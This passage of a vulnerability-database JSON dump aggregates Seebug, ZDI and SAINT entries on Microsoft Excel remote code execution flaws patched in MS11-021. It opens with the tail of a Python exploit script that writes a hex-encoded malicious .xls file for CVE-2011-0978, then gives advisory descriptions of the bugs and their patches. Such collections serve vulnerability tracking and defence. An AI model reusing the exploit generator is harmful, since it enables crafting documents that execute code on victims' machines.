000390000003a0"\r\nwD+="000003b0000003c0000003d0000003e0000003f000000400000004100000042000000feffff"\r\nwD+="ff4400000045000000460000004700000048000000490000004a000000feffffff4c0000004"\r\nwD+="d0000004e0000004f000000500000005100000052000000fefffffffdfffffffeffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff"\r\nwD+="ffffffffffffffffffffffffffffffffffffffff52006f006f007400200045006e007400720"\r\nwD+="079000000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="00000000000000000016000501ffffffffffffffff020000002008020000000000c00000000"\r\nwD+="000004600000000000000000000000000f9dd43b205cc01feffffff00000000000000005700"\r\nwD+="6f0072006b0062006f006f006b0000000000000000000000000000000000000000000000000"\r\nwD+="000000000000000000000000000000000000000000000000012000201ffffffffffffffffff"\r\nwD+="ffffff000000000000000000000000000000000000000000000000000000000000000000000"\r\nwD+="000000000002b850000000000000500530075006d006d0061007200790049006e0066006f00"\r\nwD+="72006d006100740069006f006e0000000000000000000000000000000000000000000000000"\r\nwD+="00000280002010100000003000000ffffffff00000000000000000000000000000000000000"\r\nwD+="0000000000000000000000000000000000430000000010000000000000050044006f0063007"\r\nwD+="5006d0065006e007400530075006d006d0061007200790049006e0066006f0072006d006100"\r\nwD+="740069006f006e000000000000000000000038000201ffffffffffffffffffffffff0000000"\r\nwD+="000000000000000000000000000000000000000000000000000000000000000004b00000000"\r\nwD+="10000000000000"\r\n \r\n \r\nFILE = open('webDEViL-CVE-2011-0978.xls',"wb")\r\nbacktobin=binascii.unhexlify(wD)\r\nFILE.write(backtobin)\r\nFILE.close()\n ", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.seebug.org/vuldb/ssvid-20507"}, {"lastseen": "2017-11-19T18:05:29", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 47256\r\nCVE ID: CVE-2011-0105\r\n\r\nMicrosoft Excel\u662f\u7531Microsoft\u4e3aWindows\u548cApple Macintosh\u64cd\u4f5c\u7cfb\u7edf\u7684\u7535\u8111\u800c\u7f16\u5199\u548c\u8fd0\u884c\u7684\u4e00\u6b3e\u8bd5\u7b97\u8868\u8f6f\u4ef6\u3002\r\n\r\nMicrosoft Excel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u6570\u636e\u9a8c\u8bc1\u8bb0\u5f55\u89e3\u6790\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nMicrosoft Office Excel\u5904\u7406\u7279\u5236Excel\u6587\u4ef6\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\n\nMicrosoft Excel\r\nMicrosoft Office\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528\u201cMicrosoft Office\u6587\u4ef6\u963b\u6b62\u201d\u7b56\u7565\u7981\u6b62\u5728Excel\u4e2d\u6253\u5f00\u6765\u81ea\u4e0d\u53ef\u4fe1\u4efb\u6765\u6e90\u548c\u4f4d\u7f6e\u7684Office 2003\u548c\u65e9\u671f\u7248\u672c\u7684\u6587\u4ef6\u3002\r\n\r\n* \u5728\u6253\u5f00\u672a\u77e5\u6216\u53ef\u7591\u6e90\u7684\u6587\u4ef6\u65f6\u4f7f\u7528MOICE\r\n \r\n* \u4e0d\u8981\u6253\u5f00\u6765\u81ea\u53ef\u7591\u6e90\u7684Office\u6587\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS11-021\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS11-021\uff1aVulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS11-021.asp", "modified": "2011-04-15T00:00:00", "published": "2011-04-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20482", "id": "SSV:20482", "title": "Microsoft Excel\u6570\u636e\u9a8c\u8bc1\u8bb0\u5f55\u89e3\u6790\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(MS11-021)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:05:55", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 47201\r\nCVE ID: CVE-2011-0097\r\n\r\nMicrosoft Excel\u662f\u7531Microsoft\u4e3aWindows\u548cApple Macintosh\u64cd\u4f5c\u7cfb\u7edf\u7684\u7535\u8111\u800c\u7f16\u5199\u548c\u8fd0\u884c\u7684\u4e00\u6b3e\u7535\u5b50\u8868\u683c\u8f6f\u4ef6\u3002\r\n\r\nMicrosoft Excel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u7f13\u51b2\u533a\u5206\u914d\u6574\u6570\u6ea2\u51fa\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\u6216\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nMicrosoft Office Excel\u5904\u7406\u7279\u5236Excel\u6587\u4ef6\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\u3002\n\nMicrosoft Excel\r\nMicrosoft Office\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528\u201cMicrosoft Office\u6587\u4ef6\u963b\u6b62\u201d\u7b56\u7565\u7981\u6b62\u5728Excel\u4e2d\u6253\u5f00\u6765\u81ea\u4e0d\u53ef\u4fe1\u4efb\u6765\u6e90\u548c\u4f4d\u7f6e\u7684Office 2003\u548c\u65e9\u671f\u7248\u672c\u7684\u6587\u4ef6\u3002\r\n\r\n* \u5728\u6253\u5f00\u672a\u77e5\u6216\u53ef\u7591\u6e90\u7684\u6587\u4ef6\u65f6\u4f7f\u7528MOICE\r\n \r\n* \u4e0d\u8981\u6253\u5f00\u6765\u81ea\u53ef\u7591\u6e90\u7684Office\u6587\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS11-021\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS11-021\uff1aVulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS11-021.asp", "modified": "2011-04-15T00:00:00", "published": "2011-04-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20473", "id": "SSV:20473", "title": "Microsoft Excel\u7f13\u51b2\u533a\u5206\u914d\u6574\u6570\u6ea2\u51fa\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(MS11-021)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:05:31", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 47243\r\nCVE ID: CVE-2011-0101\r\n\r\nMicrosoft Excel\u662f\u7531Microsoft\u4e3aWindows\u548cApple Macintosh\u64cd\u4f5c\u7cfb\u7edf\u7684\u7535\u8111\u800c\u7f16\u5199\u548c\u8fd0\u884c\u7684\u4e00\u6b3e\u8bd5\u7b97\u8868\u8f6f\u4ef6\u3002\r\n\r\nMicrosoft Excel "RealTimeData"\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u8bb0\u5f55\u89e3\u6790\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nMicrosoft Office Excel\u5904\u7406\u7279\u5236Excel\u6587\u4ef6\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\uff0c\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\n\nMicrosoft Excel\r\nMicrosoft Office\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528\u201cMicrosoft Office\u6587\u4ef6\u963b\u6b62\u201d\u7b56\u7565\u7981\u6b62\u5728Excel\u4e2d\u6253\u5f00\u6765\u81ea\u4e0d\u53ef\u4fe1\u4efb\u6765\u6e90\u548c\u4f4d\u7f6e\u7684Office 2003\u548c\u65e9\u671f\u7248\u672c\u7684\u6587\u4ef6\u3002\r\n\r\n* \u5728\u6253\u5f00\u672a\u77e5\u6216\u53ef\u7591\u6e90\u7684\u6587\u4ef6\u65f6\u4f7f\u7528MOICE\r\n \r\n* \u4e0d\u8981\u6253\u5f00\u6765\u81ea\u53ef\u7591\u6e90\u7684Office\u6587\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS11-021\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS11-021\uff1aVulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS11-021.asp", "modified": "2011-04-15T00:00:00", "published": "2011-04-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20484", "id": "SSV:20484", "title": "Microsoft Excel "RealTimeData"\u8bb0\u5f55\u89e3\u6790\u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f\u6d1e(MS11-021)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}, {"lastseen": "2017-11-19T18:05:00", "bulletinFamily": "exploit", "description": "BUGTRAQ ID: 47235\r\nCVE ID: CVE-2011-0098\r\n\r\nMicrosoft Excel\u662f\u7531Microsoft\u4e3aWindows\u548cApple Macintosh\u64cd\u4f5c\u7cfb\u7edf\u7684\u7535\u8111\u800c\u7f16\u5199\u548c\u8fd0\u884c\u7684\u4e00\u6b3e\u8bd5\u7b97\u8868\u8f6f\u4ef6\u3002\r\n\r\nMicrosoft Excel\u5728\u5b9e\u73b0\u4e0a\u5b58\u5728\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e\uff0c\u8fdc\u7a0b\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u4ee5\u5f53\u524d\u7528\u6237\u6743\u9650\u6267\u884c\u4efb\u610f\u4ee3\u7801\uff0c\u9020\u6210\u62d2\u7edd\u670d\u52a1\u3002\r\n\r\nMicrosoft Office Excel\u5904\u7406\u7279\u5236Excel\u6587\u4ef6\u7684\u65b9\u5f0f\u4e2d\u5b58\u5728\u4e00\u4e2a\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u6f0f\u6d1e\u3002\u6210\u529f\u5229\u7528\u6b64\u6f0f\u6d1e\u7684\u653b\u51fb\u8005\u4fbf\u53ef\u5b8c\u5168\u63a7\u5236\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u3002\u653b\u51fb\u8005\u53ef\u968f\u540e\u5b89\u88c5\u7a0b\u5e8f\uff1b\u67e5\u770b\u3001\u66f4\u6539\u6216\u5220\u9664\u6570\u636e\uff1b\u6216\u8005\u521b\u5efa\u62e5\u6709\u5b8c\u5168\u7528\u6237\u6743\u9650\u7684\u65b0\u5e10\u6237\n\nMicrosoft Excel\r\nMicrosoft Office\n\u4e34\u65f6\u89e3\u51b3\u65b9\u6cd5\uff1a\r\n\r\n* \u4f7f\u7528\u201cMicrosoft Office\u6587\u4ef6\u963b\u6b62\u201d\u7b56\u7565\u7981\u6b62\u5728Excel\u4e2d\u6253\u5f00\u6765\u81ea\u4e0d\u53ef\u4fe1\u4efb\u6765\u6e90\u548c\u4f4d\u7f6e\u7684Office 2003\u548c\u65e9\u671f\u7248\u672c\u7684\u6587\u4ef6\u3002\r\n\r\n* \u5728\u6253\u5f00\u672a\u77e5\u6216\u53ef\u7591\u6e90\u7684\u6587\u4ef6\u65f6\u4f7f\u7528MOICE\r\n \r\n* \u4e0d\u8981\u6253\u5f00\u6765\u81ea\u53ef\u7591\u6e90\u7684Office\u6587\u4ef6\r\n\r\n\u5382\u5546\u8865\u4e01\uff1a\r\n\r\nMicrosoft\r\n---------\r\nMicrosoft\u5df2\u7ecf\u4e3a\u6b64\u53d1\u5e03\u4e86\u4e00\u4e2a\u5b89\u5168\u516c\u544a\uff08MS11-021\uff09\u4ee5\u53ca\u76f8\u5e94\u8865\u4e01:\r\n\r\nMS11-021\uff1aVulnerabilities in Microsoft Excel Could Allow Remote Code Execution (2489279)\r\n\r\n\u94fe\u63a5\uff1ahttp://www.microsoft.com/technet/security/bulletin/MS11-021.asp", "modified": "2011-04-15T00:00:00", "published": "2011-04-15T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-20486", "id": "SSV:20486", "title": "Microsoft Excel\u5806\u7f13\u51b2\u533a\u6ea2\u51fa\u6f0f\u6d1e(MS11-021)", "type": "seebug", "sourceData": "", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": ""}], "zdi": [{"lastseen": "2016-11-09T00:17:55", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the way the application parses an Office Art record within a Microsoft Excel Document. Specifically, when parsing an office art object record, if an error occurs, the application will add a stray reference to an element which is part of a linked list. When receiving a window message, the application will proceed to navigate this linked list. This will access a method from the malformed object which can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-02-07T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-041", "id": "ZDI-11-041", "title": "(0day) Microsoft Office Excel Office Art Object Parsing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:59", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the application's parsing of a particular record within a Microsoft Excel Compound Document. When specifying a particular value, the application will fail to initialize a variable that is used as the length of a memcpy operation. Due to the usage of the uninitialized value, with proper control of the program flow an attacker can force a length of their own choosing for the memcpy operation. This will cause a buffer overflow and can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-04-12T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-121", "id": "ZDI-11-121", "title": "Microsoft Office XP Data Validation Record Parsing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:17:55", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the application's usage of a specific field used for incrementing an index used in an array. Due to the application failing to verify the usage of the index into the array, the application will copy the contents of the specified element into a statically sized buffer on the stack. This can lead to code execution under the context of the application.", "modified": "2011-11-09T00:00:00", "published": "2011-02-07T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-042", "id": "ZDI-11-042", "title": "(0day) Microsoft Office Excel Axis Properties Record Parsing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:07", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe flaw occurs when parsing a document with a malformed Excel document. When parsing an office art object, the application will add the malformed object to a linked list. After this addition, the application will process each element in the linked list. When handling the object in question, the application will explicitly trust a function pointer off of this object. If an attacker can substitute an object of their choosing in place of this function pointer, code execution under the context of the application can be achieved.", "modified": "2011-11-09T00:00:00", "published": "2011-02-07T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-040", "id": "ZDI-11-040", "title": "(0day) Microsoft Office Excel 2003 Invalid Object Type Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:02", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Office Excel. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe flaw exists within the methods used for RealTimeData Record Parsing. When handling a stTopic field has a bit set specifying double byte characters in the following field the value of a global pointer is improperly calculated. This pointer is later used in a memcpy operation whose source is user supplied data. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the user.", "modified": "2011-11-09T00:00:00", "published": "2011-04-12T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-120", "id": "ZDI-11-120", "title": "Microsoft Office Excel RealTimeData Record Parsing Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "saint": [{"lastseen": "2016-10-03T15:01:54", "bulletinFamily": "exploit", "description": "Added: 06/15/2011 \nCVE: [CVE-2011-0105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105>) \nBID: [47256](<http://www.securityfocus.com/bid/47256>) \nOSVDB: [71765](<http://www.osvdb.org/71765>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2002 versions lacking the patch detailed in Microsoft Security Advisory MS11-021 contain an improper initialization bug of a value that is used to allocate memory. If an attacker can get a target to open a specially formatted Excel document, they may be able to exploit this bug to execute arbitrary code on the target's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx> \n<http://secunia.com/advisories/39122> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Excel 2002 SP3 with KB2345017 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn), where the version of excel.exe was 10.0.6866. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-06-15T00:00:00", "published": "2011-06-15T00:00:00", "id": "SAINT:8FDD1727EA3EF9E282DFCB5EB73BAB71", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/excel_data_validation_record_parsing", "type": "saint", "title": "Microsoft Excel Data Validation Record Parsing Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-05-29T17:19:49", "bulletinFamily": "exploit", "description": "Added: 06/15/2011 \nCVE: [CVE-2011-0105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105>) \nBID: [47256](<http://www.securityfocus.com/bid/47256>) \nOSVDB: [71765](<http://www.osvdb.org/71765>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2002 versions lacking the patch detailed in Microsoft Security Advisory MS11-021 contain an improper initialization bug of a value that is used to allocate memory. If an attacker can get a target to open a specially formatted Excel document, they may be able to exploit this bug to execute arbitrary code on the target's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx> \n<http://secunia.com/advisories/39122> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Excel 2002 SP3 with KB2345017 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn), where the version of excel.exe was 10.0.6866. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-06-15T00:00:00", "published": "2011-06-15T00:00:00", "href": "http://download.saintcorporation.com/cgi-bin/exploit_info/excel_data_validation_record_parsing", "id": "SAINT:267E40AEADBF5F2FFB79C86829E9CD8F", "type": "saint", "title": "Microsoft Excel Data Validation Record Parsing Overflow", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-06-04T23:19:31", "bulletinFamily": "exploit", "description": "Added: 06/15/2011 \nCVE: [CVE-2011-0105](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0105>) \nBID: [47256](<http://www.securityfocus.com/bid/47256>) \nOSVDB: [71765](<http://www.osvdb.org/71765>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2002 versions lacking the patch detailed in Microsoft Security Advisory MS11-021 contain an improper initialization bug of a value that is used to allocate memory. If an attacker can get a target to open a specially formatted Excel document, they may be able to exploit this bug to execute arbitrary code on the target's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx> \n<http://secunia.com/advisories/39122> \n\n\n### Limitations\n\nThis exploit has been tested against Microsoft Excel 2002 SP3 with KB2345017 running on Microsoft Windows XP SP3 English (DEP OptIn) and Microsoft Windows 7 SP1 (DEP OptIn), where the version of excel.exe was 10.0.6866. \n\n### Platforms\n\nWindows \n \n\n", "modified": "2011-06-15T00:00:00", "published": "2011-06-15T00:00:00", "id": "SAINT:CBF7317F9C70B260229D429B6501B612", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/excel_data_validation_record_parsing", "title": "Microsoft Excel Data Validation Record Parsing Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2016-10-03T15:01:59", "bulletinFamily": "exploit", "description": "Added: 11/08/2011 \nCVE: [CVE-2011-0097](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0097>) \nOSVDB: [71758](<http://www.osvdb.org/71758>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2007 versions lacking the patch (KB2464583) detailed in Microsoft Security Advisory MS11-021 contain an integer overflow vulnerability when parsing data included in a `**400h**` substream. An attacker who entices a user to open a specially formatted Excel document may be able to execute arbitrary code on the user's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS11-021> \n<http://secunia.com/advisories/39122/> \n\n\n### Limitations\n\nExploit works on Microsoft Excel 2007 SP2. \n\nThis exploit requires the Compress-Zlib PERL module, which is available from [cpan.org](<http://cpan.org/modules/by-module/Compress/>). \n\n### Platforms\n\nWindows XP \nWindows 7 \n \n\n", "modified": "2011-11-08T00:00:00", "published": "2011-11-08T00:00:00", "id": "SAINT:013CEB50A5B7225D03F444037190A7BC", "href": "http://www.saintcorporation.com/cgi-bin/exploit_info/excel_substream_parsing_integer_overflow", "type": "saint", "title": "Microsoft Excel Substream Parsing Integer Overflow", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-06-04T23:19:41", "bulletinFamily": "exploit", "description": "Added: 11/08/2011 \nCVE: [CVE-2011-0097](<http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-0097>) \nOSVDB: [71758](<http://www.osvdb.org/71758>) \n\n\n### Background\n\nMicrosoft Excel, part of the [Microsoft Office](<http://office.microsoft.com>) product suite, is a spreadsheet application for Windows and Macintosh platforms. \n\n### Problem\n\nMicrosoft Excel 2007 versions lacking the patch (KB2464583) detailed in Microsoft Security Advisory MS11-021 contain an integer overflow vulnerability when parsing data included in a `**400h**` substream. An attacker who entices a user to open a specially formatted Excel document may be able to execute arbitrary code on the user's system. \n\n### Resolution\n\nApply the patch outlined in [Microsoft Security Advisory MS11-021](<http://www.microsoft.com/technet/security/Bulletin/MS11-021.mspx>). \n\n### References\n\n<http://technet.microsoft.com/en-us/security/bulletin/MS11-021> \n<http://secunia.com/advisories/39122/> \n\n\n### Limitations\n\nExploit works on Microsoft Excel 2007 SP2. \n\nThis exploit requires the Compress-Zlib PERL module, which is available from [cpan.org](<http://cpan.org/modules/by-module/Compress/>). \n\n### Platforms\n\nWindows XP \nWindows 7 \n \n\n", "modified": "2011-11-08T00:00:00", "published": "2011-11-08T00:00:00", "id": "SAINT:7B206168EE040415028D1ACACF7854DD", "href": "https://my.saintcorporation.com/cgi-bin/exploit_info/excel_substream_parsing_integer_overflow", "title": "Microsoft Excel Substream Parsing Integer Overflow", "type": "saint", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T17:19:46", "bulletinFamily": "exploit", "description": "Added: 